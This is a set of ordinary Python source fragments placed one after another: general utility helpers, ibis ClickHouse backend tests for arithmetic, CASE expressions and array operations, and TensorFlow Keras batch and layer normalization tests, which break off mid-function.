        return str(self.function(*self.args, **self.kwargs))
def camelize(s):
    """Convert an underscore_separated string to CamelCase."""
    spaced = s.replace('_', ' ')
    return ''.join(spaced.title().split())
def round_val(val):
    """Round *val* to the nearest integer, halves rounding up.

    Uses the decimal module because it behaves consistently across
    Python versions (2.x vs. 3.x), unlike the builtin round().
    """
    quantized = decimal.Decimal(val).quantize(
        decimal.Decimal('1'), rounding=decimal.ROUND_HALF_UP)
    return int(quantized)
def replace_file(file_name, data, file_mode=0o644):
    """Replaces the contents of file_name with data in a safe manner.

    First write to a temp file and then rename. Since POSIX renames are
    atomic, the file is unlikely to be corrupted by competing writes.

    We create the tempfile on the same device to ensure that it can be
    renamed.
    """
    target_dir = os.path.dirname(os.path.abspath(file_name))
    tmp_file = tempfile.NamedTemporaryFile('w+',
                                           dir=target_dir,
                                           delete=False)
    with tmp_file:
        tmp_file.write(data)
    os.chmod(tmp_file.name, file_mode)
    os.rename(tmp_file.name, file_name)
def load_class_by_alias_or_classname(namespace, name):
    """Load class using stevedore alias or the class name

    :param namespace: namespace where the alias is defined
    :param name: alias or class name of the class to be loaded
    :returns: the loaded class
    :raises ImportError: if the class cannot be loaded by either method
    """
    if not name:
        LOG.error(_LE("Alias or class name is not set"))
        raise ImportError(_("Class not found."))
    try:
        # Try to resolve class by alias
        mgr = driver.DriverManager(namespace, name)
        class_to_load = mgr.driver
    except RuntimeError:
        # Remember the alias failure so it can still be logged if the
        # class-name fallback below also fails.
        e1_info = sys.exc_info()
        # Fallback to class name
        try:
            class_to_load = importutils.import_class(name)
        except (ImportError, ValueError):
            LOG.error(_LE("Error loading class by alias"),
                      exc_info=e1_info)
            LOG.error(_LE("Error loading class by class name"),
                      exc_info=True)
            raise ImportError(_("Class not found."))
    return class_to_load
|
|
import operator
from datetime import date, datetime
import numpy as np
import pandas as pd
import pandas.testing as tm
import pytest
import ibis
import ibis.expr.datatypes as dt
from ibis import literal as L
pytest.importorskip("clickhouse_driver")
@pytest.mark.parametrize(
    ('left', 'right', 'type'),
    [
        (L('2017-04-01'), date(2017, 4, 2), dt.date),
        (date(2017, 4, 2), L('2017-04-01'), dt.date),
        (
            L('2017-04-01 01:02:33'),
            datetime(2017, 4, 1, 1, 3, 34),
            dt.timestamp,
        ),
        (
            datetime(2017, 4, 1, 1, 3, 34),
            L('2017-04-01 01:02:33'),
            dt.timestamp,
        ),
    ],
)
@pytest.mark.parametrize(
    'op',
    [
        operator.eq,
        operator.ne,
        operator.lt,
        operator.le,
        operator.gt,
        operator.ge,
    ],
)
def test_string_temporal_compare(con, op, left, right, type):
    """Comparing string/temporal operands matches comparing both sides
    explicitly casted to the temporal type."""
    result = con.execute(op(left, right))
    left_value = con.execute(L(left).cast(type))
    right_value = con.execute(L(right).cast(type))
    assert result == op(left_value, right_value)
@pytest.mark.parametrize(
    ('func', 'left', 'right', 'expected'),
    [
        (operator.add, L(3), L(4), 7),
        (operator.sub, L(3), L(4), -1),
        (operator.mul, L(3), L(4), 12),
        (operator.truediv, L(12), L(4), 3),
        (operator.pow, L(12), L(2), 144),
        (operator.mod, L(12), L(5), 2),
        (operator.truediv, L(7), L(2), 3.5),
        (operator.floordiv, L(7), L(2), 3),
        (lambda x, y: x.floordiv(y), L(7), 2, 3),
        (lambda x, y: x.rfloordiv(y), L(2), 7, 3),
    ],
)
def test_binary_arithmetic(con, func, left, right, expected):
    """Each arithmetic operator on literals evaluates to the expected value."""
    assert con.execute(func(left, right)) == expected
@pytest.mark.parametrize(
    ('op', 'expected'),
    [
        (lambda a, b: a + b, '`int_col` + `tinyint_col`'),
        (lambda a, b: a - b, '`int_col` - `tinyint_col`'),
        (lambda a, b: a * b, '`int_col` * `tinyint_col`'),
        (lambda a, b: a / b, '`int_col` / `tinyint_col`'),
        (lambda a, b: a**b, 'pow(`int_col`, `tinyint_col`)'),
        (lambda a, b: a < b, '`int_col` < `tinyint_col`'),
        (lambda a, b: a <= b, '`int_col` <= `tinyint_col`'),
        (lambda a, b: a > b, '`int_col` > `tinyint_col`'),
        (lambda a, b: a >= b, '`int_col` >= `tinyint_col`'),
        (lambda a, b: a == b, '`int_col` = `tinyint_col`'),
        (lambda a, b: a != b, '`int_col` != `tinyint_col`'),
    ],
)
def test_binary_infix_operators(con, alltypes, translate, op, expected):
    """Infix operators translate to the expected ClickHouse SQL and run."""
    expr = op(alltypes.int_col, alltypes.tinyint_col)
    assert translate(expr) == expected
    assert len(con.execute(expr))
# TODO: test boolean operators
# (h & bool_col, '`h` AND (`a` > 0)'),
# (h | bool_col, '`h` OR (`a` > 0)'),
# (h ^ bool_col, 'xor(`h`, (`a` > 0))')
@pytest.mark.parametrize(
    ('op', 'expected'),
    [
        (
            lambda a, b, c: (a + b) + c,
            '(`int_col` + `tinyint_col`) + `double_col`',
        ),
        (lambda a, b, c: a.log() + c, 'log(`int_col`) + `double_col`'),
        (
            lambda a, b, c: (b + (-(a + c))),
            '`tinyint_col` + (-(`int_col` + `double_col`))',
        ),
    ],
)
def test_binary_infix_parenthesization(con, alltypes, translate, op, expected):
    """Nested expressions are parenthesized correctly in generated SQL."""
    expr = op(alltypes.int_col, alltypes.tinyint_col, alltypes.double_col)
    assert translate(expr) == expected
    assert len(con.execute(expr))
def test_between(con, alltypes, translate):
    """BETWEEN renders as expected SQL and executes."""
    between_expr = alltypes.int_col.between(0, 10)
    assert translate(between_expr) == '`int_col` BETWEEN 0 AND 10'
    assert len(con.execute(between_expr))
@pytest.mark.parametrize(
    ('left', 'right'),
    [
        (L('2017-03-31').cast(dt.date), date(2017, 4, 2)),
        (date(2017, 3, 31), L('2017-04-02').cast(dt.date)),
    ],
)
def test_string_temporal_compare_between_dates(con, left, right):
    """A date cast from a string falls between mixed-type date bounds."""
    target = ibis.timestamp('2017-04-01').cast(dt.date)
    assert con.execute(target.between(left, right))
@pytest.mark.parametrize(
    ('left', 'right'),
    [
        (
            L('2017-03-31 00:02:33').cast(dt.timestamp),
            datetime(2017, 4, 1, 1, 3, 34),
        ),
        (
            datetime(2017, 3, 31, 0, 2, 33),
            L('2017-04-01 01:03:34').cast(dt.timestamp),
        ),
    ],
)
def test_string_temporal_compare_between_datetimes(con, left, right):
    """A timestamp falls between mixed-type datetime bounds."""
    target = ibis.timestamp('2017-04-01 00:02:34')
    assert con.execute(target.between(left, right))
@pytest.mark.parametrize('container', [list, tuple, set])
def test_field_in_literals(con, alltypes, translate, container):
    """isin/notin accept any container type and render as IN / NOT IN."""
    values = {'foo', 'bar', 'baz'}
    foobar = container(values)
    expected = tuple(values)

    in_expr = alltypes.string_col.isin(foobar)
    assert translate(in_expr) == f"`string_col` IN {expected}"
    assert len(con.execute(in_expr))

    not_in_expr = alltypes.string_col.notin(foobar)
    assert translate(not_in_expr) == f"`string_col` NOT IN {expected}"
    assert len(con.execute(not_in_expr))
@pytest.mark.parametrize('column', ['int_col', 'float_col', 'bool_col'])
def test_negate(con, alltypes, translate, column):
    """Unary minus renders for numeric and (UInt8-backed) boolean columns."""
    # clickhouse represent boolean as UInt8
    negated = -getattr(alltypes, column)
    assert translate(negated) == f'-`{column}`'
    assert len(con.execute(negated))
@pytest.mark.parametrize(
    'field',
    [
        'tinyint_col',
        'smallint_col',
        'int_col',
        'bigint_col',
        'float_col',
        'double_col',
        'year',
        'month',
    ],
)
def test_negate_non_boolean(con, alltypes, field, df):
    """Negating a numeric column matches pandas negation on the same rows."""
    table = alltypes.limit(10)
    projected = table.projection([(-table[field]).name(field)])
    result = projected.execute()[field]
    tm.assert_series_equal(result, -df.head(10)[field])
def test_negate_literal(con):
    """Negating a float literal round-trips through the backend."""
    assert round(con.execute(-L(5.245)), 3) == -5.245
@pytest.mark.parametrize(
    ('op', 'pandas_op'),
    [
        (
            lambda t: (t.double_col > 20).ifelse(10, -20),
            lambda df: pd.Series(
                np.where(df.double_col > 20, 10, -20), dtype='int8'
            ),
        ),
        (
            lambda t: (t.double_col > 20).ifelse(10, -20).abs(),
            lambda df: (
                pd.Series(np.where(df.double_col > 20, 10, -20))
                .abs()
                .astype('int8')
            ),
        ),
    ],
)
def test_ifelse(alltypes, df, op, pandas_op, translate):
    """Boolean ifelse matches the equivalent pandas computation."""
    result = op(alltypes).execute()
    result.name = None
    tm.assert_series_equal(result, pandas_op(df))
def test_simple_case(con, alltypes, translate):
    """CASE <column> WHEN ... form translates to the expected SQL and runs."""
    t = alltypes
    expr = (
        t.string_col.case()
        .when('foo', 'bar')
        .when('baz', 'qux')
        .else_('default')
        .end()
    )

    expected = """CASE `string_col`
  WHEN 'foo' THEN 'bar'
  WHEN 'baz' THEN 'qux'
  ELSE 'default'
END"""
    assert translate(expr) == expected
    assert len(con.execute(expr))
def test_search_case(con, alltypes, translate):
    """Searched CASE (no base column) translates to the expected SQL."""
    t = alltypes
    expr = (
        ibis.case()
        .when(t.float_col > 0, t.int_col * 2)
        .when(t.float_col < 0, t.int_col)
        .else_(0)
        .end()
    )

    expected = """CASE
  WHEN `float_col` > 0 THEN `int_col` * 2
  WHEN `float_col` < 0 THEN `int_col`
  ELSE 0
END"""
    assert translate(expr) == expected
    assert len(con.execute(expr))
@pytest.mark.parametrize(
    'arr',
    [
        [1, 2, 3],
        ['qw', 'wq', '1'],
        [1.2, 0.3, 0.4],
        [[1], [1, 2], [1, 2, 3]],
    ],
)
@pytest.mark.parametrize(
    'ids',
    [
        lambda arr: range(len(arr)),
        lambda arr: range(-len(arr), 0),
    ],
)
def test_array_index(con, arr, ids):
    """Positive and negative indexing into array literals matches Python."""
    expr = L(arr)
    for idx in ids(arr):
        assert con.execute(expr[idx]) == arr[idx]
@pytest.mark.parametrize(
    'arrays',
    [
        ([1], [2]),
        ([1], [1, 2]),
        ([1, 2], [1]),
        ([1, 2], [3, 4]),
        ([1, 2], [3, 4], [5, 6]),
    ],
)
def test_array_concat(con, arrays):
    """Concatenating array literals with + matches list concatenation."""
    expr = L([]).cast(dt.Array(dt.int8))
    for arr in arrays:
        expr = expr + L(arr)
    assert con.execute(expr) == sum(arrays, [])
@pytest.mark.parametrize(
    ('arr', 'times'),
    [([1], 1), ([1], 2), ([1], 3), ([1, 2], 1), ([1, 2], 2), ([1, 2], 3)],
)
def test_array_repeat(con, arr, times):
    """Multiplying an array literal repeats it like a Python list."""
    assert con.execute(L(arr) * times) == arr * times
@pytest.mark.parametrize('arr', [[], [1], [1, 2, 3, 4, 5, 6]])
@pytest.mark.parametrize('start', [None, 0, 1, 2, -1, -3])
@pytest.mark.parametrize('stop', [None, 0, 1, 3, -2, -4])
def test_array_slice(con, arr, start, stop):
    """Array slicing matches Python list slicing semantics."""
    sliced = L(arr)[start:stop]
    assert con.execute(sliced) == arr[start:stop]
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for normalization layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import def_function
from tensorflow.python.eager import wrap_function
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import ops
from tensorflow.python.keras import combinations
from tensorflow.python.keras import keras_parameterized
from tensorflow.python.keras import testing_utils
from tensorflow.python.keras.layers import normalization
from tensorflow.python.keras.layers import normalization_v2
from tensorflow.python.keras.mixed_precision import policy
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gradient_checker_v2
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import test
from tensorflow.python.training import gradient_descent
class BatchNormalizationTest(keras_parameterized.TestCase):
  """Behavioral tests covering both V1 and V2 BatchNormalization layers."""

  @keras_parameterized.run_all_keras_modes
  def test_basic_batchnorm(self):
    """Smoke-test construction/fit/serialization for common kwarg sets."""
    testing_utils.layer_test(
        keras.layers.BatchNormalization,
        kwargs={
            'momentum': 0.9,
            'epsilon': 0.1,
            'gamma_regularizer': keras.regularizers.l2(0.01),
            'beta_regularizer': keras.regularizers.l2(0.01)
        },
        input_shape=(3, 4, 2))
    testing_utils.layer_test(
        keras.layers.BatchNormalization,
        kwargs={
            'gamma_initializer': 'ones',
            'beta_initializer': 'ones',
            'moving_mean_initializer': 'zeros',
            'moving_variance_initializer': 'ones'
        },
        input_shape=(3, 4, 2))
    testing_utils.layer_test(
        keras.layers.BatchNormalization,
        kwargs={'scale': False,
                'center': False},
        input_shape=(3, 3))
    testing_utils.layer_test(
        keras.layers.BatchNormalization,
        kwargs={
            'gamma_initializer': 'ones',
            'beta_initializer': 'ones',
            'moving_mean_initializer': 'zeros',
            'moving_variance_initializer': 'ones'
        },
        input_shape=(3, 2, 4, 2))

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_batchnorm_weights(self):
    """scale/center toggles control which of the 4 weights are trainable."""
    # Without gamma/beta only the two (non-trainable) moving stats remain.
    layer = keras.layers.BatchNormalization(scale=False, center=False)
    layer.build((None, 3, 4))
    self.assertEqual(len(layer.trainable_weights), 0)
    self.assertEqual(len(layer.weights), 2)

    layer = keras.layers.BatchNormalization()
    layer.build((None, 3, 4))
    self.assertEqual(len(layer.trainable_weights), 2)
    self.assertEqual(len(layer.weights), 4)

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_batchnorm_regularization(self):
    """Regularizers yield losses; constraints attach to gamma and beta."""
    layer = keras.layers.BatchNormalization(
        gamma_regularizer='l1', beta_regularizer='l1')
    layer.build((None, 3, 4))
    self.assertEqual(len(layer.losses), 2)
    max_norm = keras.constraints.max_norm
    layer = keras.layers.BatchNormalization(
        gamma_constraint=max_norm, beta_constraint=max_norm)
    layer.build((None, 3, 4))
    self.assertEqual(layer.gamma.constraint, max_norm)
    self.assertEqual(layer.beta.constraint, max_norm)

  @keras_parameterized.run_all_keras_modes
  def test_batchnorm_convnet(self):
    """Channels-first conv input is normalized per channel (GPU only)."""
    if test.is_gpu_available(cuda_only=True):
      with self.session(use_gpu=True):
        model = keras.models.Sequential()
        norm = keras.layers.BatchNormalization(
            axis=1, input_shape=(3, 4, 4), momentum=0.8)
        model.add(norm)
        model.compile(
            loss='mse',
            optimizer=gradient_descent.GradientDescentOptimizer(0.01),
            run_eagerly=testing_utils.should_run_eagerly())

        # centered on 5.0, variance 10.0
        x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 3, 4, 4))
        model.fit(x, x, epochs=4, verbose=0)
        out = model.predict(x)
        # Undo beta/gamma so the remaining output should be ~N(0, 1).
        out -= np.reshape(keras.backend.eval(norm.beta), (1, 3, 1, 1))
        out /= np.reshape(keras.backend.eval(norm.gamma), (1, 3, 1, 1))

        np.testing.assert_allclose(np.mean(out, axis=(0, 2, 3)), 0.0,
                                   atol=1e-1)
        np.testing.assert_allclose(np.std(out, axis=(0, 2, 3)), 1.0,
                                   atol=1e-1)

  @keras_parameterized.run_all_keras_modes
  def test_batchnorm_convnet_channel_last(self):
    """Channels-last conv input is normalized per channel."""
    model = keras.models.Sequential()
    norm = keras.layers.BatchNormalization(
        axis=-1, input_shape=(4, 4, 3), momentum=0.8)
    model.add(norm)
    model.compile(
        loss='mse',
        optimizer=gradient_descent.GradientDescentOptimizer(0.01),
        run_eagerly=testing_utils.should_run_eagerly())

    # centered on 5.0, variance 10.0
    x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 4, 4, 3))
    model.fit(x, x, epochs=4, verbose=0)
    out = model.predict(x)
    # Undo beta/gamma so the remaining output should be ~N(0, 1).
    out -= np.reshape(keras.backend.eval(norm.beta), (1, 1, 1, 3))
    out /= np.reshape(keras.backend.eval(norm.gamma), (1, 1, 1, 3))

    np.testing.assert_allclose(np.mean(out, axis=(0, 1, 2)), 0.0, atol=1e-1)
    np.testing.assert_allclose(np.std(out, axis=(0, 1, 2)), 1.0, atol=1e-1)

  @keras_parameterized.run_all_keras_modes
  def test_batchnorm_correctness(self):
    """Both V1 and V2 layers normalize float32 data correctly."""
    _run_batchnorm_correctness_test(
        normalization.BatchNormalization, dtype='float32')
    _run_batchnorm_correctness_test(
        normalization_v2.BatchNormalization, dtype='float32')

  @keras_parameterized.run_all_keras_modes
  def test_batchnorm_float16(self):
    """Both V1 and V2 layers normalize float16 data correctly."""
    _run_batchnorm_correctness_test(
        normalization.BatchNormalization, dtype='float16')
    _run_batchnorm_correctness_test(
        normalization_v2.BatchNormalization, dtype='float16')

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  @testing_utils.enable_v2_dtype_behavior
  def test_batchnorm_mixed_precision(self):
    """mixed_float16 policy: float16 outputs with float32 variables."""
    norm = keras.layers.BatchNormalization(
        axis=-1,
        input_shape=(4, 4, 3),
        momentum=0.8,
        dtype=policy.Policy('mixed_float16'))
    x = np.random.normal(size=(10, 4, 4, 3))
    y = norm(x)
    self.assertEqual(y.dtype, 'float16')
    self.assertEqual(norm.beta.dtype.base_dtype, 'float32')
    self.assertEqual(norm.gamma.dtype.base_dtype, 'float32')

  @combinations.generate(combinations.combine(mode=['graph', 'eager'],
                                              fused=[True, False]))
  @testing_utils.enable_v2_dtype_behavior
  def test_batchnorm_mixed_precision_does_not_overflow(self, fused):
    """Inputs near float16 limits still normalize without overflow."""
    norm = keras.layers.BatchNormalization(
        axis=-1,
        input_shape=(1, 1, 1),
        fused=fused,
        dtype=policy.Policy('mixed_float16'))
    x = np.array([-1000., 1000.]).reshape((2, 1, 1, 1))
    y = norm(x, training=True)
    expected_y = np.array([-1.0, 1.0]).reshape((2, 1, 1, 1))
    self.assertAllClose(keras.backend.eval(y), expected_y)

  @keras_parameterized.run_all_keras_modes(always_skip_v1=True)
  def test_batchnorm_non_trainable_with_fit(self):
    """Recompiling with trainable=False freezes BN statistics during fit."""
    # We use the same data shape for all the data we use in this test.
    # This will prevent any used tf.functions from retracing.
    # This helps us verify that changing trainable and recompiling really
    # does update the training loop, rather than a different data shape
    # triggering a retrace.
    data_shape = (100, 3)

    inputs = keras.Input((3,))
    bn = normalization_v2.BatchNormalization()
    outputs = bn(inputs)
    model = keras.Model(inputs, outputs)
    model.compile(
        'rmsprop',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    model.fit(np.random.random(data_shape), np.random.random(data_shape))

    test_data = np.random.random(data_shape)
    test_targets = np.random.random(data_shape)
    test_loss = model.evaluate(test_data, test_targets)

    bn.trainable = False
    model.compile(
        'rmsprop',
        'mse',
        run_eagerly=testing_utils.should_run_eagerly())
    # With BN frozen, training should not change the loss on this batch.
    train_loss = model.train_on_batch(test_data, test_targets)
    self.assertAlmostEqual(test_loss, train_loss)

  @keras_parameterized.run_all_keras_modes(always_skip_v1=True)
  def test_eager_batchnorm_in_custom_model_call_with_tf_function(self):
    """BN updates moving stats inside a tf.function-wrapped call()."""

    class MyModel(keras.Model):

      def __init__(self):
        super(MyModel, self).__init__()
        self.bn = keras.layers.BatchNormalization()

      @def_function.function()
      def call(self, x, training):
        return self.bn(x, training=training)

    model = MyModel()

    for _ in range(10):
      x = constant_op.constant(0.5, shape=[1, 1])
      model(x, training=True)

    # Make sure the moving mean and variance have been updated
    self.assertAllClose(model.bn.moving_mean.numpy(), [0.047], atol=3e-3)
    self.assertAllClose(model.bn.moving_variance.numpy(), [0.9], atol=3e-2)

  @combinations.generate(combinations.combine(mode=['eager']))
  def test_bessels_correction(self):
    """Fused BN applies Bessel's correction; the non-fused path does not."""
    # Bessel's correction is currently only used in the fused case. In the
    # future, it may be used in the nonfused case as well.

    x = constant_op.constant([0., 2.], shape=[2, 1, 1, 1])
    layer = normalization_v2.BatchNormalization(
        momentum=0.5, moving_variance_initializer='zeros')
    layer(x, training=True)
    self.assertTrue(layer.fused)
    # Since fused is used, Bessel's correction is used. The variance of [0, 2]
    # is 2 with Bessel's correction. Since the momentum is 0.5, the variance is
    # 2 * 0.5 == 1.
    self.assertAllEqual(self.evaluate(layer.moving_variance), [1.])

    # A 5D input forces the non-fused implementation.
    x = constant_op.constant([0., 2.], shape=[2, 1, 1, 1, 1])
    layer = normalization_v2.BatchNormalization(
        momentum=0.5, moving_variance_initializer='zeros')
    layer(x, training=True)
    self.assertFalse(layer.fused)
    # Since fused is not used, Bessel's correction is not used. The variance of
    # [0, 2] is 1 without Bessel's correction. Since the momentum is 0.5, the
    # variance is 1 * 0.5 == 0.5.
    self.assertAllEqual(self.evaluate(layer.moving_variance), [0.5])
class BatchNormalizationV1Test(keras_parameterized.TestCase):
  """Tests specific to the V1 BatchNormalization implementation."""

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_v1_fused_attribute(self):
    """V1 defaults to fused=True for 4D inputs unless explicitly disabled
    or incompatible options (virtual_batch_size) are set."""
    layer = normalization.BatchNormalization()
    inputs = keras.layers.Input((4, 4, 4))
    layer(inputs)
    self.assertEqual(layer.fused, True)

    layer = normalization.BatchNormalization(fused=False)
    self.assertEqual(layer.fused, False)
    inputs = keras.layers.Input(shape=(4, 4, 4))
    layer(inputs)
    self.assertEqual(layer.fused, False)

    layer = normalization.BatchNormalization(virtual_batch_size=2)
    self.assertEqual(layer.fused, True)
    inputs = keras.layers.Input(shape=(2, 2, 2))
    layer(inputs)
    self.assertEqual(layer.fused, False)
class BatchNormalizationV2Test(keras_parameterized.TestCase):
  """Tests specific to the V2 BatchNormalization implementation."""

  @keras_parameterized.run_all_keras_modes
  def test_basic_batchnorm_v2(self):
    """Smoke-test explicit-fused and auto-fused V2 layers."""
    testing_utils.layer_test(
        normalization_v2.BatchNormalization,
        kwargs={'fused': True},
        input_shape=(3, 3, 3, 3))
    testing_utils.layer_test(
        normalization_v2.BatchNormalization,
        kwargs={'fused': None},
        input_shape=(3, 3, 3))

  @combinations.generate(combinations.combine(mode=['graph', 'eager']))
  def test_v2_fused_attribute(self):
    """`fused` stays None until build, then resolves from input rank/axis."""
    norm = normalization_v2.BatchNormalization()
    self.assertEqual(norm.fused, None)
    inp = keras.layers.Input(shape=(4, 4, 4))
    norm(inp)
    self.assertEqual(norm.fused, True)

    norm = normalization_v2.BatchNormalization()
    self.assertEqual(norm.fused, None)
    inp = keras.layers.Input(shape=(4, 4))
    norm(inp)
    self.assertEqual(norm.fused, False)

    norm = normalization_v2.BatchNormalization()
    self.assertIsNone(norm.fused)
    inp = keras.layers.Input(shape=(4, 4, 4, 4))
    norm(inp)
    self.assertEqual(norm.fused, False)

    norm = normalization_v2.BatchNormalization(virtual_batch_size=2)
    self.assertEqual(norm.fused, False)
    inp = keras.layers.Input(shape=(4, 4, 4))
    norm(inp)
    self.assertEqual(norm.fused, False)

    norm = normalization_v2.BatchNormalization(fused=False)
    self.assertEqual(norm.fused, False)
    inp = keras.layers.Input(shape=(4, 4, 4))
    norm(inp)
    self.assertEqual(norm.fused, False)

    norm = normalization_v2.BatchNormalization(fused=True, axis=[3])
    self.assertEqual(norm.fused, True)
    inp = keras.layers.Input(shape=(4, 4, 4))
    norm(inp)
    self.assertEqual(norm.fused, True)

    # Explicit fused=True must be rejected for incompatible options.
    with self.assertRaisesRegex(ValueError, 'fused.*renorm'):
      normalization_v2.BatchNormalization(fused=True, renorm=True)

    with self.assertRaisesRegex(ValueError, 'fused.*when axis is 1 or 3'):
      normalization_v2.BatchNormalization(fused=True, axis=2)

    with self.assertRaisesRegex(ValueError, 'fused.*when axis is 1 or 3'):
      normalization_v2.BatchNormalization(fused=True, axis=[1, 3])

    with self.assertRaisesRegex(ValueError, 'fused.*virtual_batch_size'):
      normalization_v2.BatchNormalization(fused=True, virtual_batch_size=2)

    with self.assertRaisesRegex(ValueError, 'fused.*adjustment'):
      normalization_v2.BatchNormalization(fused=True,
                                          adjustment=lambda _: (1, 0))

    # fused=True requires a 4D/5D input at call time.
    norm = normalization_v2.BatchNormalization(fused=True)
    self.assertEqual(norm.fused, True)
    inp = keras.layers.Input(shape=(4, 4))
    with self.assertRaisesRegex(ValueError, '4D or 5D input tensors'):
      norm(inp)

  def test_updates_in_wrap_function(self):
    """BN update ops are tracked when called inside a wrap_function."""

    def my_func():
      layer = normalization.BatchNormalization()
      x = array_ops.ones((10, 1))
      y = layer(x, training=True)
      # Updates should be tracked in a `wrap_function`.
      self.assertLen(layer.updates, 2)
      return y

    wrapped_fn = wrap_function.wrap_function(my_func, [])
    wrapped_fn()

  @keras_parameterized.run_all_keras_modes
  def test_basic_batchnorm_v2_none_shape_and_virtual_batch_size(self):
    """virtual_batch_size builds with unknown spatial dimensions."""
    # Test case for GitHub issue for 32380
    norm = normalization_v2.BatchNormalization(virtual_batch_size=8)
    inp = keras.layers.Input(shape=(None, None, 3))
    _ = norm(inp)
def _run_batchnorm_correctness_test(layer, dtype='float32', fused=False):
  """Fit a single-BN model on normal data; outputs should be ~N(0, 1)."""
  model = keras.models.Sequential()
  model.add(keras.Input(shape=(2, 2, 2), dtype=dtype))
  norm = layer(momentum=0.8, fused=fused)
  model.add(norm)
  if dtype == 'float16':
    # Keras models require float32 losses.
    model.add(keras.layers.Lambda(lambda x: keras.backend.cast(x, 'float32')))
  model.compile(
      loss='mse',
      optimizer=gradient_descent.GradientDescentOptimizer(0.01),
      run_eagerly=testing_utils.should_run_eagerly())

  # centered on 5.0, variance 10.0
  samples = np.random.normal(
      loc=5.0, scale=10.0, size=(1000, 2, 2, 2)).astype(dtype)
  model.fit(samples, samples, epochs=4, verbose=0)
  predictions = model.predict(samples)
  # Undo beta/gamma so what remains should be standard-normal.
  normalized = predictions - keras.backend.eval(norm.beta)
  normalized = normalized / keras.backend.eval(norm.gamma)

  np.testing.assert_allclose(normalized.mean(), 0.0, atol=2e-1)
  np.testing.assert_allclose(normalized.std(), 1.0, atol=2e-1)
@parameterized.parameters(
    [normalization.BatchNormalization, normalization_v2.BatchNormalization])
class NormalizationLayersGraphModeOnlyTest(
    test.TestCase, parameterized.TestCase):
  """Graph-mode-only tests, parameterized over the V1 and V2 BN layers."""

  def test_shared_batchnorm(self, layer):
    """Test that a BN layer can be shared across different data streams."""
    with self.cached_session():
      # Test single layer reuse
      bn = layer()
      x1 = keras.layers.Input(shape=(10,))
      _ = bn(x1)

      x2 = keras.layers.Input(shape=(10,))
      y2 = bn(x2)

      x = np.random.normal(loc=5.0, scale=10.0, size=(2, 10))
      model = keras.models.Model(x2, y2)
      model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
      model.train_on_batch(x, x)

      # Test model-level reuse
      x3 = keras.layers.Input(shape=(10,))
      y3 = model(x3)
      new_model = keras.models.Model(x3, y3, name='new_model')

      new_model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')
      new_model.train_on_batch(x, x)

  def test_that_trainable_disables_updates(self, layer):
    """Setting trainable=False (model- or layer-level) freezes outputs."""
    with self.cached_session():
      val_a = np.random.random((10, 4))
      val_out = np.random.random((10, 4))

      a = keras.layers.Input(shape=(4,))
      layer = layer(input_shape=(4,))
      b = layer(a)
      model = keras.models.Model(a, b)

      model.trainable = False
      model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')

      # Frozen model: training a batch must not change predictions.
      x1 = model.predict(val_a)
      model.train_on_batch(val_a, val_out)
      x2 = model.predict(val_a)
      self.assertAllClose(x1, x2, atol=1e-7)

      model.trainable = True
      model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')

      # Trainable again: predictions must move after training.
      model.train_on_batch(val_a, val_out)
      x2 = model.predict(val_a)
      assert np.abs(np.sum(x1 - x2)) > 1e-5

      layer.trainable = False
      model.compile(gradient_descent.GradientDescentOptimizer(0.01), 'mse')

      # Layer-level freeze has the same effect as model-level freeze.
      x1 = model.predict(val_a)
      model.train_on_batch(val_a, val_out)
      x2 = model.predict(val_a)
      self.assertAllClose(x1, x2, atol=1e-7)

  def test_batchnorm_trainable(self, layer):
    """Tests that batchnorm layer is trainable when learning phase is enabled.

    Computes mean and std for current inputs then
    applies batch normalization using them.

    Args:
      layer: Either V1 or V2 of BatchNormalization layer.
    """
    # TODO(fchollet): enable in all execution modes when issue with
    # learning phase setting is resolved.
    with ops.Graph().as_default(), self.cached_session():
      bn_mean = 0.5
      bn_std = 10.
      val_a = np.expand_dims(np.arange(10.), axis=1)

      def get_model(bn_mean, bn_std):
        # Weights: gamma=1, beta=0, moving_mean=bn_mean,
        # moving_variance=bn_std**2.
        inp = keras.layers.Input(shape=(1,))
        x = layer()(inp)
        model1 = keras.models.Model(inp, x)
        model1.set_weights([
            np.array([1.]),
            np.array([0.]),
            np.array([bn_mean]),
            np.array([bn_std**2])
        ])
        return model1

      # Simulates training-mode with trainable layer.
      # Should use mini-batch statistics.
      with keras.backend.learning_phase_scope(1):
        model = get_model(bn_mean, bn_std)
        model.compile(loss='mse', optimizer='rmsprop')
        out = model.predict(val_a)
        self.assertAllClose(
            (val_a - np.mean(val_a)) / np.std(val_a), out, atol=1e-3)
def _run_layernorm_correctness_test(layer, dtype='float32'):
    # Trains a LayerNormalization `layer` on random normal data and checks
    # that, after removing beta/gamma, its output is (approximately)
    # standardized (mean 0, std 1).
    # NOTE(review): the leading Lambda always casts inputs to 'float16' even
    # when `dtype` is 'float32' — presumably intentional for the
    # mixed-precision variant of this test, but confirm against callers.
    model = keras.models.Sequential()
    model.add(keras.layers.Lambda(lambda x: math_ops.cast(x, dtype='float16')))
    norm = layer(input_shape=(2, 2, 2), dtype=dtype)
    model.add(norm)
    model.compile(
        loss='mse',
        optimizer=gradient_descent.GradientDescentOptimizer(0.01),
        run_eagerly=testing_utils.should_run_eagerly())

    # centered on 5.0, variance 10.0
